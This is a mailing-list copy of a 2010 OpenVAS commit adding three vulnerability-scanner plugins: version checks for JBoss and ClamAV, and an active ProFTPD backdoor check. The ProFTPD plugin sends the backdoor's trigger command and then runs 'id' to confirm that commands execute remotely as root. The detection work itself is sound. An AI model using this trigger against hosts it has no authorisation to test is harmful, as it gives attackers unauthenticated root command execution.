[Openvas-commits] r9607 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Dec 2 19:42:27 CET 2010 

Author: mime
Date: 2010-12-02 19:42:22 +0100 (Thu, 02 Dec 2010)
New Revision: 9607

Added:
   trunk/openvas-plugins/scripts/gb_JBoss_enterprise_aplication_server_45148.nasl
   trunk/openvas-plugins/scripts/gb_clamav_45152.nasl
   trunk/openvas-plugins/scripts/gb_proftpd_backdoor_45150.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2010-12-02 13:19:27 UTC (rev 9606)
+++ trunk/openvas-plugins/ChangeLog	2010-12-02 18:42:22 UTC (rev 9607)
@@ -1,5 +1,12 @@
 2010-12-02  Michael Meyer <michael.meyer at greenbone.net>
 
+	* scripts/gb_JBoss_enterprise_aplication_server_45148.nasl,
+	scripts/gb_proftpd_backdoor_45150.nasl,
+	scripts/gb_clamav_45152.nasl:
+	Added new plugins.
+
+2010-12-02  Michael Meyer <michael.meyer at greenbone.net>
+
 	* scripts/gb_perl_CGI_45145.nasl,
 	scripts/gb_LittlePhpGallery_45143.nasl,
 	scripts/gb_bind_45134.nasl:

Added: trunk/openvas-plugins/scripts/gb_JBoss_enterprise_aplication_server_45148.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_JBoss_enterprise_aplication_server_45148.nasl	2010-12-02 13:19:27 UTC (rev 9606)
+++ trunk/openvas-plugins/scripts/gb_JBoss_enterprise_aplication_server_45148.nasl	2010-12-02 18:42:22 UTC (rev 9607)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# JBoss Enterprise Application Platform Multiple Remote Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100931);
+ script_bugtraq_id(45148);
+ script_cve_id("CVE-2010-3708","CVE-2010-3862","CVE-2010-3878");
+ script_version ("1.0-$Revision$");
+
+ script_name("JBoss Enterprise Application Platform Multiple Remote Vulnerabilities");
+
+desc = "Overview:
+The JBoss Enterprise Application Platform is prone to multiple
+vulnerabilities, including a remote code-execution issue, a remote denial-of-
+service issue, and a cross-site request-forgery issue.
+
+Successful exploits can allow attackers to execute arbitrary
+code within the context of the affected application, perform
+certain administrative actions, deploy arbitrary WAR files on
+the server, or cause denial-of-service conditions; other attacks
+may also be possible.
+
+These issues affect JBoss Enterprise Application Platform 4.3.0; other
+versions may also be affected.
+
+Solution:
+Updates are available; please see the references for more information.
+
+References:
+https://www.securityfocus.com/bid/45148
+http://www.jboss.com/products/platforms/application/";
+
+ script_tag(name:"risk_factor", value:"Critical");
+ script_description(desc);
+ script_summary("Determine if installed JBoss version is vulnerable");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("JBoss_enterprise_aplication_server_detect.nasl");
+ script_require_ports("Services/www", 8080);
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:8080);
+if(!get_port_state(port))exit(0);
+
+if(!vers = get_kb_item(string("www/", port,"/jboss_enterprise_application_server")))exit(0);
+
+if(!isnull(vers) && vers >!< "unknown") {
+
+  if("GA_CP0" >< vers) {
+    version = eregmatch(pattern:"([0-9.]+)GA_CP0([1-9]+)", string: vers);
+    if(!isnull(version[2])) {
+      vers = version[1] + version[2];
+    }  
+  }  
+    
+  if("GA" >< vers)vers = vers - ".GA";
+
+  if(version_is_less(version: vers, test_version: "4.3.0.9")) {
+      security_hole(port:port);
+      exit(0);
+  }
+
+}
+
+exit(0);
+
+


Property changes on: trunk/openvas-plugins/scripts/gb_JBoss_enterprise_aplication_server_45148.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_clamav_45152.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_clamav_45152.nasl	2010-12-02 13:19:27 UTC (rev 9606)
+++ trunk/openvas-plugins/scripts/gb_clamav_45152.nasl	2010-12-02 18:42:22 UTC (rev 9607)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ClamAV Prior to 0.96.5 Multiple Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100932);
+ script_bugtraq_id(45152);
+ script_version ("1.0-$Revision$");
+
+ script_name("ClamAV Prior to 0.96.5 Multiple Vulnerabilities");
+
+desc = "Overview:
+ClamAV is prone to multiple vulnerabilities.
+
+Attackers may exploit these issues to cause denial-of-service
+conditions or potentially execute arbitrary code in the context of the
+application.
+
+Versions prior to ClamAV 0.96.5 are vulnerable.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+https://www.securityfocus.com/bid/45152
+http://git.clamav.net/gitweb?p=clamav-devel.git;a=commitdiff;h=1f3db7f074995bd4e1d0183b2db8b1c472d2f41b
+http://www.clamav.net/
+http://git.clamav.net/gitweb?p=clamav-devel.git;a=commitdiff;h=019f1955194360600ecf0644959ceca6734c2d7b
+http://freshmeat.net/projects/clamav/releases/325193";
+
+ script_tag(name:"risk_factor", value:"Critical");
+ script_description(desc);
+ script_summary("Determine if installed ClamAV version is vulnerable");
+ script_category(ACT_GATHER_INFO);
+ script_family("Denial of Service");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("gb_clamav_detect_lin.nasl","gb_clamav_detect_win.nasl","gb_clamav_remote_detect.nasl");
+ exit(0);
+}
+
+include("version_func.inc");
+
+port = get_kb_item("Services/clamd");
+if(!port)port = 0;
+
+ver = get_kb_item("ClamAV/remote/Ver");
+if(!ver) {
+  ver = get_kb_item("ClamAV/Lin/Ver");
+  if(!ver) {
+    ver = get_kb_item("ClamAV/Win/Ver");
+  }  
+}  
+
+if(!ver)exit(0);
+
+if(version_is_less(version:ver, test_version:"0.96.5")){
+    security_hole(port:port);
+    exit(0);
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_clamav_45152.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_proftpd_backdoor_45150.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_proftpd_backdoor_45150.nasl	2010-12-02 13:19:27 UTC (rev 9606)
+++ trunk/openvas-plugins/scripts/gb_proftpd_backdoor_45150.nasl	2010-12-02 18:42:22 UTC (rev 9607)
@@ -0,0 +1,120 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ProFTPD Backdoor Unauthorized Access Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+desc = "Overview:
+ProFTPD is prone to an unauthorized-access vulnerability due to a
+backdoor in certain versions of the application.
+
+Exploiting this issue allows remote attackers to execute arbitrary
+system commands with superuser privileges.
+
+The issue affects the ProFTPD 1.3.3c package downloaded between
+November 28 and December 2, 2010.
+
+The MD5 sums of the unaffected ProFTPD 1.3.3c source packages are
+as follows:
+
+8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2
+4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz
+
+Files with MD5 sums other than those listed above should be
+considered affected.
+
+Solution:
+The vendor released an advisory to address the issue. Please see the
+references for more information.
+
+References:
+https://www.securityfocus.com/bid/45150
+http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org
+http://www.proftpd.org";
+
+if (description)
+{
+ script_id(100933);
+ script_bugtraq_id(45150);
+ script_version ("1.0-$Revision$");
+
+ script_name("ProFTPD Backdoor Unauthorized Access Vulnerability");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_description(desc);
+ script_summary("Determine if ProFTPD is installed with a backdoor");
+ script_category(ACT_ATTACK);
+ script_family("Gain a shell remotely");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("ftp_func.inc");
+
+port = get_kb_item("Services/ftp");
+if(!port){
+  port = 21;
+}
+
+if(get_kb_item('ftp/'+port+'/broken'))exit(0);
+
+if(!get_port_state(port)){
+  exit(0);
+}
+
+banner = get_ftp_banner(port:port);
+if(banner && "ProFTPD" >!< banner)exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc){
+  exit(0);
+}
+
+ftp_recv_line(socket:soc);
+
+ex = string("HELP ACIDBITCHEZ");
+
+r  = ftp_send_cmd(socket:soc, cmd:ex);
+r1 = ftp_send_cmd(socket:soc, cmd:string("id;"));
+
+ftp_close(socket:soc);
+
+if(!r1) {
+  exit(0);
+} 
+
+if(egrep(pattern:"uid=[0-9]+.*gid=[0-9]+", string:r1)) {
+
+  data  = desc + string("\n\n**************************\n");
+  data += string("\nIt was possible to execute the command 'id' on the remote host,\nwhich produces the following output:\n\n");
+  data += r1;
+  data += string("\n**************************\n");
+
+  security_hole(port:port,data:data);
+  exit(0);
+}
+
+exit(0); 
+
+     


Property changes on: trunk/openvas-plugins/scripts/gb_proftpd_backdoor_45150.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

More information about the Openvas-commits mailing list